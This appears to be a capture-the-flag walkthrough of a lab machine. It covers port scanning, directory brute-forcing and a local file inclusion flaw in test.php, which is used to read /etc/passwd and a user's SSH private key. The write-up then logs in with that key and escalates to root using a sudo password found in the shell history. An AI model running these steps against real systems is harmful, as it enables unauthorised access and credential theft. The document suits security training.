netdiscover
192.168.0.24
rustscan
1 | rustscan -a 192.168.0.24 --ulimit 10000 |
The port 80, 443 and 9090 are interesting.
Port 9090
A login page.
Fedora server
Port 443
Simple CMS 2.2.15
There is an exploit on this version:
https://www.exploit-db.com/exploits/49345
gobuster
1 | gobuster dir -u http://192.168.0.27 -w Documents/wordlist/directory-list-2.3-medium.txt -x php --wildcard switch |
- Admin login page
http://192.168.0.27/admin/login.php
Users
- qiu
Infos
They have a problem about a backdoor.
LFI
https://book.hacktricks.xyz/pentesting-web/file-inclusion
http://192.168.0.27/test.php?file=/etc/passwd
1 | root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin systemd-coredump:x:999:996:systemd Core Dumper:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:995:User for polkitd:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin cockpit-ws:x:997:993:User for cockpit-ws:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin chrony:x:996:991::/var/lib/chrony:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin qiu:x:1000:1000:qiu:/home/qiu:/bin/bash apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin nginx:x:995:990:Nginx web server:/var/lib/nginx:/sbin/nologin tss:x:59:59:Account used by the tpm2-abrmd package to sandbox the tpm2-abrmd daemon:/dev/null:/sbin/nologin clevis:x:994:989:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false |
The user qiu also exist on the system
I can access to his home directory
http://192.168.0.27/test.php?file=/home/qiu/.bashrc
1 | # .bashrc # Source global definitions if [ -f /etc/bashrc ]; then . /etc/bashrc fi # Uncomment the following line if you don't like systemctl's auto-paging feature: # export SYSTEMD_PAGER= # User specific aliases and functions |
id_rsa key
http://192.168.0.27/test.php?file=/home/qiu/.ssh/id_rsa
1 | -----BEGIN OPENSSH PRIVATE KEY----- |
1 | wget 'http://192.168.0.27/test.php?file=/home/qiu/.ssh/id_rsa' -o id_rsa |
ssh
1 | ssh [email protected] -i id_rsa |
I’m in :D
It’s too late now.
Let’s see what is in the history.
1 | echo "remarkablyawesomE" | sudo -S dnf update |
I’m root.
